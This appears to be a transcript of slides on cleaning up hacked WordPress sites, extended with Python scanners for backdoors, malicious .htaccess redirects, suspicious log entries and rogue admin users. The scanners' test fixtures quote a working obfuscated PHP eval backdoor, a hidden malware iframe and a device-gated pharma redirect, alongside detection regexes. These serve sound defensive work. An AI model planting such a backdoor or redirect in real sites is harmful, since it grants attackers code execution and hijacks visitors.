  • 16. IT'S VERY COMMON, THAT BACKDOORS DON'T HAVE ANY VISIBLE SIGNS IN THE SITE CODE AND IT'S IMPOSSIBLE TO DETECT THEM BY ACCESSING THE INFECTED SITE FROM OUTSIDE. ~ SUCURI
  • 17. Removing Backdoors
     Check WordPress core integrity using Sucuri plugin https://wordpress.org/plugins/sucuri-scanner/
     Delete and reinstall WordPress core files, plugins, and themes
     Check wp-content and uploads folder carefully for hacked PHP files
     Run https://wordpress.org/plugins/gotmls/ to check for hacked files in the wp-content folder
     Gravity Forms hack: which of these files is not like the others?
  • 18. DIY HACK RECOVERY
     Via SFTP (preferred) or FTP
     1. Backup: Download everything. Good to examine later for details of hack if needed.
     2. Delete all except: cgi-bin, .htaccess, wp-config.php (examine these)
     3. Upload fresh: WordPress, Themes, Plugins, cleaned uploads
  • 19. Hmmmm? PHP in a CSS folder?
     Look for modified dates
     Look for unusual names
     Compare file list to original download
     Look for file types that don’t belong
     Check commonly hacked files: .htaccess, wp-config.php, index.php, functions.php, header.php
     Any file can be hacked!
  • 20. 2 - Drive by Downloads
     Script injected on website generates links to malware sites or downloads malware from your site to visitors’ computers.
     Easy for scanners to detect.
  • 21. Cleaning up Drive by Downloads
     Use Sucuri Sitecheck to scan site; read about hack
     Disable javascript before hitting your site – don’t want to end up infecting your own computer while checking your site.
     Remove hacked code from content or files.
     Commonly hacked core files: index.php and wp-blog-header.php
     Commonly hacked theme files: index.php, functions.php, header.php, footer.php
     Monitor site
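A file scan that turns slides 17, 19 and 21 into a check you can run over a downloaded copy of wp-content, added here as an example; it is not code from the talk or from the Sucuri or GOTMLS plugins. It flags PHP files sitting in asset folders such as uploads or css, obfuscated eval() constructions like the backdoor shown on slide 2, hidden iframes of the drive-by-download kind, and files modified recently. The directory layout, file names, the malware.example host and the modification-time cutoff are constructed for the demonstration; the backdoor string is the slide-2 sample, used only as scanner input.

```python
import os
import re
import tempfile
import time

# Heuristics for obfuscated PHP backdoors, modelled on the slide-2 sample
# (a superglobal name assembled with strtoupper() and handed to eval()).
PHP_PATTERNS = {
    "eval-on-variable-variable": re.compile(r"eval\s*\(\s*\$\{?\$"),
    "eval-on-request-data": re.compile(r"eval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)"),
    "decoded-payload-executed": re.compile(
        r"(eval|assert|create_function)\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\("),
    "assembled-superglobal-name": re.compile(r"strtoupper\s*\(\s*\$\w+\[\d+\]"),
}
# Injected front-end code typical of drive-by download hacks (slides 20-21).
HTML_PATTERNS = {
    "hidden-iframe": re.compile(
        r"<iframe[^>]*(width\s*=\s*[\"']?0\b|height\s*=\s*[\"']?0\b|display\s*:\s*none)", re.I),
    "script-via-unescape": re.compile(r"document\.write\s*\(\s*unescape\s*\(", re.I),
}
# Directories where a PHP file has no business being (slide 19: "PHP in a CSS folder?").
NO_PHP_DIRS = {"uploads", "css", "js", "images", "img", "fonts"}
PHP_EXTS = {".php", ".phtml", ".php5"}
MARKUP_EXTS = PHP_EXTS | {".html", ".htm", ".js"}


def scan_tree(root, modified_since=None):
    """Walk a wp-content style tree; return {relative_path: sorted list of reasons}."""
    findings = {}

    def flag(rel, reason):
        findings.setdefault(rel, set()).add(reason)

    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            ext = os.path.splitext(name)[1].lower()
            parent_dirs = set(rel.lower().split("/")[:-1])
            if ext in PHP_EXTS and parent_dirs & NO_PHP_DIRS:
                flag(rel, "php-file-in-asset-dir")
            if modified_since is not None and os.path.getmtime(path) >= modified_since:
                flag(rel, "modified-recently")
            if ext not in MARKUP_EXTS:
                continue
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            patterns = dict(HTML_PATTERNS)
            if ext in PHP_EXTS:
                patterns.update(PHP_PATTERNS)
            for reason, rx in patterns.items():
                if rx.search(text):
                    flag(rel, reason)
    return {rel: sorted(reasons) for rel, reasons in findings.items()}


# Constructed sample tree: a clean theme file, a stylesheet, a footer with a
# drive-by iframe, and the slide-2 backdoor dropped into the uploads folder.
BACKDOOR_SAMPLE = (  # slide-2 sample, used here only as input for the scanner
    '<?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);'
    "if(isset(${$s20}['q53b3a6'])){eval(${$s20}['q53b3a6']);}?>"
)
SAMPLE_FILES = {
    "themes/twentyfifteen/functions.php": "<?php\nadd_theme_support('title-tag');\n",
    "themes/twentyfifteen/css/style.css": "body { margin: 0; }\n",
    "themes/twentyfifteen/footer.php": (
        '<?php wp_footer(); ?>\n<iframe src="http://malware.example/x" width="0" height="0"></iframe>\n'),
    "uploads/2015/05/css.php": BACKDOOR_SAMPLE,
}
FRESH = {"themes/twentyfifteen/footer.php", "uploads/2015/05/css.php"}  # "touched by the hack"


def build_sample_tree(root):
    """Write SAMPLE_FILES under root; files not in FRESH get a 30-day-old mtime."""
    old = time.time() - 30 * 86400
    for rel, content in SAMPLE_FILES.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
        if rel not in FRESH:
            os.utime(path, (old, old))


def analyze_sample():
    """Build the constructed tree in a temp dir and scan it with a 7-day cutoff."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan_tree(root, modified_since=time.time() - 7 * 86400)


if __name__ == "__main__":
    for rel, reasons in sorted(analyze_sample().items()):
        print(f"{rel}: {', '.join(reasons)}")
```

Run it against a real download by calling scan_tree() on the wp-content directory with a cutoff around the date the trouble started; anything flagged "php-file-in-asset-dir" or with an eval pattern deserves a look before you start deleting and re-uploading.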
  • 22. 3 - Pharma Hack
     Spam links injected onto web pages only visible to search engines.
     Difficult to scan for because cloaked.
  • 23. Cleaning up Pharma Hack
     Use http://www.botsvsbrowsers.com/SimulateUserAgent.asp to scan site using different devices to find hack
     Search site with Google: site:yoursitename.com
     Same clean up as Drive by Downloads
     Can be cross-infected from other sites on server/hosting account
     Read this: https://blog.sucuri.net/2011/02/cleaning-up-an-infected-web-site-part-i-wordpress-and-the-pharma-hack.html
  • 24. 4 - Malicious Redirects
     Redirects traffic from your website to another, typically by modifying the .htaccess file, sometimes only when viewed by a particular device or browser, like a phone
     Hacked .htaccess file
  • 25. Finding and Removing Malicious Redirects
     Listen when someone tells you that they tried to visit your site and couldn’t, and find out which browser or device they were using at the time.
     Use http://www.botsvsbrowsers.com/SimulateUserAgent.asp to verify
     Scan with Sucuri’s SiteCheck https://sitecheck.sucuri.net/
     Check all the .htaccess files on the server and remove the redirect.
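An .htaccess review in the spirit of slides 24 and 25, added as an example and not part of the presentation. It lists every redirect to a host other than your own and shows which RewriteCond variables (user agent, referer) gate it, which is exactly the device-only behaviour described above; it also goes one step beyond the slides and reports php_value auto_prepend_file/auto_append_file lines, another way a modified .htaccess can pull a rogue PHP file into every request. The site hostnames (example.com) and the sample .htaccess contents are constructed.

```python
import re
from urllib.parse import urlparse

# Assumed: the hostnames this site legitimately redirects to.
SITE_HOSTS = {"example.com", "www.example.com"}
COND_VAR = re.compile(r"%\{(\w+)\}")   # server variables referenced by a RewriteCond
REDIRECT_DIRECTIVES = ("Redirect", "RedirectMatch", "RedirectPermanent", "RedirectTemp")


def _external_host(target, site_hosts):
    """Return the hostname if target is an absolute URL pointing off-site, else None."""
    host = urlparse(target).hostname
    # "%" means the host is built from a server variable (e.g. %{HTTP_HOST}); leave it alone.
    if host and "%" not in host and host.lower() not in site_hosts:
        return host.lower()
    return None


def find_suspicious_directives(htaccess_text, site_hosts=SITE_HOSTS):
    """Scan .htaccess text for off-site redirects and PHP auto-include settings.

    Returns a list of dicts with the line number, directive, off-site host (or None)
    and, for RewriteRule, the RewriteCond variables that gate the rule.
    """
    findings = []
    pending_conds = []   # RewriteCond lines apply only to the next RewriteRule
    for lineno, raw in enumerate(htaccess_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        directive = parts[0]
        if directive == "RewriteCond":
            pending_conds.append(line)
            continue
        if directive == "RewriteRule":
            conds, pending_conds = pending_conds, []
            target = parts[2] if len(parts) > 2 else ""
            host = _external_host(target, site_hosts)
            if host:
                gated_by = sorted({v for c in conds for v in COND_VAR.findall(c)})
                findings.append({"line": lineno, "directive": directive,
                                 "host": host, "gated_by": gated_by})
        elif directive in REDIRECT_DIRECTIVES:
            host = _external_host(parts[-1], site_hosts)
            if host:
                findings.append({"line": lineno, "directive": directive,
                                 "host": host, "gated_by": []})
        elif directive in ("php_value", "php_flag") and len(parts) > 1 and parts[1] in (
                "auto_prepend_file", "auto_append_file"):
            # Loads an arbitrary PHP file into every request: review what it points at.
            findings.append({"line": lineno, "directive": f"{directive} {parts[1]}",
                             "host": None, "gated_by": []})
    return findings


# Constructed sample: the standard WordPress block, an injected redirect that only
# fires for phones arriving from a search engine, and one legitimate internal redirect.
SAMPLE_HTACCESS = "\n".join([
    "# BEGIN WordPress",
    "<IfModule mod_rewrite.c>",
    "RewriteEngine On",
    "RewriteBase /",
    r"RewriteRule ^index\.php$ - [L]",
    "RewriteCond %{REQUEST_FILENAME} !-f",
    "RewriteCond %{REQUEST_FILENAME} !-d",
    "RewriteRule . /index.php [L]",
    "</IfModule>",
    "# END WordPress",
    "RewriteCond %{HTTP_USER_AGENT} (android|iphone|ipad) [NC]",
    "RewriteCond %{HTTP_REFERER} (google|bing|yahoo) [NC]",
    "RewriteRule ^(.*)$ http://bad-pharma.example/?go=$1 [R=302,L]",
    "Redirect 301 /old-page http://www.example.com/new-page",
])

if __name__ == "__main__":
    for f in find_suspicious_directives(SAMPLE_HTACCESS):
        print(f)
```

Because the injected rule only fires for mobile user agents coming from a search engine, the owner never sees it from a desktop bookmark; the gated_by list tells you which conditions to reproduce (as the user-agent simulator on the slide does) when confirming the fix.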
  • 26. MONITORING TIPS
     Check raw access logs via cPanel
     Why are people from Thailand and Romania accessing a strangely named PHP file somewhere? db12.php, css.php, dirs35.php????
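The raw-access-log check from slide 26 written out as an added example (not the author's script): it parses Apache/cPanel combined-format lines and groups requests for PHP files that are not one of WordPress's normal entry points, noting POSTs and anything under wp-content/uploads. The log lines, IP addresses and file names (including db12.php and css.php from the slide) are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Apache / cPanel "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?'
)
# PHP entry points a normal WordPress site is expected to serve directly.
EXPECTED_PHP = {"/index.php", "/wp-login.php", "/wp-cron.php", "/xmlrpc.php",
                "/wp-comments-post.php", "/wp-signup.php", "/wp-activate.php",
                "/wp-trackback.php", "/wp-links-opml.php"}
# Dashboard and core library paths; treated as expected to keep the report short.
EXPECTED_PREFIXES = ("/wp-admin/", "/wp-includes/")


def suspicious_php_requests(log_text):
    """Group requests for PHP files outside WordPress's normal entry points.

    Returns {path: {"hits": n, "ips": [...], "methods": [...], "reasons": [...]}}.
    """
    out = defaultdict(lambda: {"hits": 0, "ips": set(), "methods": set(), "reasons": set()})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = urlsplit(m.group("target")).path
        if not path.lower().endswith((".php", ".phtml", ".php5")):
            continue
        if path in EXPECTED_PHP or path.startswith(EXPECTED_PREFIXES):
            continue
        entry = out[path]
        entry["hits"] += 1
        entry["ips"].add(m.group("ip"))
        entry["methods"].add(m.group("method"))
        entry["reasons"].add("php-outside-known-entry-points")
        if path.startswith("/wp-content/uploads/"):
            entry["reasons"].add("php-under-uploads")      # uploads should never hold PHP
        if m.group("method") == "POST":
            entry["reasons"].add("post-to-unknown-php")    # how a dropped backdoor is driven
    return {p: {k: (sorted(v) if isinstance(v, set) else v) for k, v in e.items()}
            for p, e in out.items()}


# Constructed sample log: two hits on a PHP file in uploads, one on an odd root-level
# file, and normal traffic that must not be reported.
SAMPLE_LOG = "\n".join([
    '203.0.113.5 - - [12/May/2015:03:14:07 -0600] "POST /wp-content/uploads/2015/05/css.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [12/May/2015:03:15:41 -0600] "GET /db12.php?x=1 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [12/May/2015:03:16:02 -0600] "GET /index.php HTTP/1.1" 200 5321 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [12/May/2015:03:16:30 -0600] "POST /wp-login.php HTTP/1.1" 302 0 "http://example.com/wp-login.php" "Mozilla/5.0"',
    '203.0.113.5 - - [12/May/2015:03:17:09 -0600] "POST /wp-content/uploads/2015/05/css.php HTTP/1.1" 200 480 "-" "Mozilla/5.0"',
    '192.0.2.12 - - [12/May/2015:03:18:00 -0600] "GET /wp-content/themes/twentyfifteen/style.css HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.0.2.13 - - [12/May/2015:03:18:20 -0600] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
])

if __name__ == "__main__":
    for path, info in sorted(suspicious_php_requests(SAMPLE_LOG).items()):
        print(path, info)
```

Feed it the raw log downloaded from cPanel; the paths it reports are the ones to cross-check against the file listing on the server, and the IPs are what you would look up to answer the "why Thailand and Romania?" question on the slide.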
  • 27. Use Google Search Console!
     Google Webmaster Tools/Search Console
     Search Queries – you can spot queries irrelevant to your site.
     Links to Your Site – you can find suspicious incoming links here.
     Internal Links – this report can help reveal rogue sections of your site.
     http://askwpgirl.com/submitting-wordpress-site-google-webmaster-tools/
  • 28. Check for rogue users and posts
     Your new admin friends?
     Find hidden admin users: http://snipe.net/2010/01/when-wordpress-gets-hacked/
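The slide-28 check done against the database rather than the dashboard, as an added example that is not from the talk or the linked snipe.net post: it reads wp_capabilities straight from wp_usermeta to list administrators the owner does not recognise, and searches published post content for cloaked markup of the pharma-hack kind. It assumes the default wp_ table prefix and uses an in-memory SQLite copy with constructed rows; the two SQL statements run unchanged against a real MySQL database.

```python
import re
import sqlite3

# Assumed: default "wp_" table prefix. Only the columns used here are modelled.
SCHEMA = """
CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_email TEXT,
                       display_name TEXT, user_registered TEXT);
CREATE TABLE wp_usermeta (umeta_id INTEGER PRIMARY KEY, user_id INTEGER,
                          meta_key TEXT, meta_value TEXT);
CREATE TABLE wp_posts (ID INTEGER PRIMARY KEY, post_title TEXT, post_content TEXT,
                       post_status TEXT, post_type TEXT);
"""
ADMIN_QUERY = """
SELECT u.ID, u.user_login, u.user_email, u.user_registered, m.meta_value
FROM wp_users u JOIN wp_usermeta m ON m.user_id = u.ID
WHERE m.meta_key = 'wp_capabilities' AND m.meta_value LIKE '%administrator%'
ORDER BY u.ID
"""
POSTS_QUERY = "SELECT ID, post_content FROM wp_posts WHERE post_status = 'publish'"
# Role names set to true inside WordPress's PHP-serialized capabilities array.
ROLE_RE = re.compile(r's:\d+:"([^"]+)";b:1;')
# Markup that hides content from humans but not from search engines, or injects script.
HIDDEN_CONTENT = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d{3,}px|<script\b", re.I)

# Constructed sample rows: the site owner, an editor, a rogue admin registered during
# the incident window, one clean post and one page carrying a cloaked spam link.
SAMPLE_ROWS = {
    "wp_users": [
        (1, "angela", "angela@example.com", "Angela", "2012-03-01 10:00:00"),
        (2, "editor1", "editor@example.com", "Editor", "2013-06-15 09:30:00"),
        (7, "wp_updater", "x@mail.example", "", "2015-05-11 02:47:19"),
    ],
    "wp_usermeta": [
        (1, 1, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
        (2, 2, "wp_capabilities", 'a:1:{s:6:"editor";b:1;}'),
        (3, 7, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
    ],
    "wp_posts": [
        (10, "Hello world", "<p>Welcome to my site.</p>", "publish", "post"),
        (11, "About", '<p>About us.</p><div style="display:none">'
                      '<a href="http://cheap-pills.example/">buy</a></div>', "publish", "page"),
    ],
}


def open_sample_db():
    """In-memory SQLite stand-in for the WordPress database, loaded with SAMPLE_ROWS."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO wp_users VALUES (?,?,?,?,?)", SAMPLE_ROWS["wp_users"])
    conn.executemany("INSERT INTO wp_usermeta VALUES (?,?,?,?)", SAMPLE_ROWS["wp_usermeta"])
    conn.executemany("INSERT INTO wp_posts VALUES (?,?,?,?,?)", SAMPLE_ROWS["wp_posts"])
    return conn


def unexpected_admins(conn, known_admin_logins, since=None):
    """Administrators read from the database (not the dashboard list) that are either
    not on the owner's known list or were registered on/after `since` (YYYY-MM-DD)."""
    rogue = []
    for uid, login, email, registered, caps in conn.execute(ADMIN_QUERY):
        if "administrator" not in ROLE_RE.findall(caps):
            continue   # LIKE matched inside another string; not really an admin
        if login not in known_admin_logins or (since and registered >= since):
            rogue.append({"id": uid, "login": login, "email": email, "registered": registered})
    return rogue


def posts_with_hidden_content(conn):
    """IDs of published posts/pages whose content contains cloaked or scripted markup."""
    return [pid for pid, content in conn.execute(POSTS_QUERY) if HIDDEN_CONTENT.search(content)]


if __name__ == "__main__":
    db = open_sample_db()
    print(unexpected_admins(db, {"angela"}, since="2015-05-01"))
    print(posts_with_hidden_content(db))
```

Running the two queries in phpMyAdmin or the mysql client gives the same rows; the point of going to the database is that a rogue account or a hidden div can be filtered out of what the dashboard shows, but not out of the tables themselves.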
  • 29. Audit Activity on Site https://wordpress.org/plugins/wp-simple-firewall/
  • 30. IMMEDIATELY CHANGE PASSWORDS
     Use Sucuri plugin to Generate New Security Keys
     Reset all passwords, including WordPress users, FTP, web hosting, control panel
     Scan computer for viruses!
  • 31. CLEAN UP “BAD” HACK
     If hackers got admin access to site or database, you might have to nuke the entire site from orbit — it’s the only way to be sure https://www.youtube.com/watch?v=aCbfMkh940Q
     See http://askwpgirl.com/nuke-it-from-orbit/ for step-by-step elimination
     Or contact sucuri.net for site clean up and monitoring
  • 32. REQUEST SITE REVIEW
     If Google blacklisted your site or marked it for phishing scam, you will need to request a review after you are certain you’ve cleaned up all hacked files:
     https://support.google.com/webmasters/answer/168328?hl=en
  • 34. UPDATE UPDATE UPDATE
     Timely updates are critical for security.
     Tools: iControlWP, InfiniteWP, Jetpack, ManageWP
     http://askwpgirl.com/updating-wordpress-plugins-themes-core/
  • 35. UPDATING PREMIUM THEMES AND PLUGINS
     Often a manual process - Download and FTP new files
     Bundled plugins are not supported or auto updated
     Enter license key/purchase code in settings to receive updates
     http://askwpgirl.com/updating-wordpress-plugins-themes-core/
  • 36. SECURE YOUR LOGIN
     Online Generator: http://www.pctools.com/guides/password/
     Track Passwords: http://agilebits.com/products/1Password
     Enable Two-Factor Authentication: http://askwpgirl.com/wordpress-two-factor-authentication-plugins/
  • 37. RUN A TIGHT SHIP!
     Delete ALL unused stuff on server
     Only use popular and well-maintained themes and plugins
     Don’t allow users to register (Settings > General)
     Always hold comments for moderation and use spam filtering (Akismet plugin)
  • 38. GOOD HOSTING
     Correct File Permissions
     WordPress Auto Updates
     Firewall and Scanning
     Regular Backups
     Server Security
     Performance Optimization
     Managed WordPress Hosts: Site Ground, WP Engine, Get Flywheel, Web Synthesis, Pantheon
  • 39. EFFECTIVE SECURITY PLUGIN FEATURES
     Limit login access
     Block bad URL requests with a Firewall
     Audit activity
     Security through obscurity is not security
     IP addresses don’t matter and should not be used as the foundation of a WordPress security policy
     My favorite security plugin: https://wordpress.org/plugins/wp-simple-firewall/ Does all the above and more. Will notify you of vulnerable plugins.
  • 40. BACKUPS
     Common wisdom is to back up your site
     Backups are to your site what major medical health care coverage is to your health
     Usually only helpful in case of a disaster
     Services: VaultPress and WorpDrive good hosted solutions!
     Plugins: BackupBuddy (paid), BackWPUp, Duplicator
  • 41. SECURE YOUR COMPUTER
     Scan for viruses and trojans
     Be careful about downloading stuff!!!!
  • 42. RESOURCES
     http://snipe.net/2010/01/when-wordpress-gets-hacked/
     https://support.google.com/webmasters/answer/163633?rd=1 ***
     http://aw-snap.info/articles/find-backdoor.php
     http://codex.wordpress.org/FAQ_My_site_was_hacked
     http://sucuri.net - free scan, hack recovering, site monitoring, great posts on how to clean up specific hacks
     http://askwpgirl.com/nuke-it-from-orbit
     https://www.icontrolwp.com/2014/05/wordpress-security-simple-firewall-plugin-part-4-login-protection-feature/
     https://www.icontrolwp.com/2014/06/beware-new-security-theat-wordpress-misinformation-virus/
     About the banking hack: https://www.proofpoint.com/es/node/327
     Top 10 Web application security risks for developers: https://youtu.be/nuWR_HiBHYc
     http://www.smashingmagazine.com/2012/10/four-malware-infections-wordpress/
  • 43. CONTACT
     facebook.com/askwpgirl
     twitter.com/askwpgirl
     http://askwpgirl.com
     http://boulderdigitalarts.com
     One-on-One consulting third Friday of every month at Boulder Digital Arts
     Six-week theme customization course in Colorado and online.
     SEO and Best Maintenance Tips Newsletter http://askwpgirl.com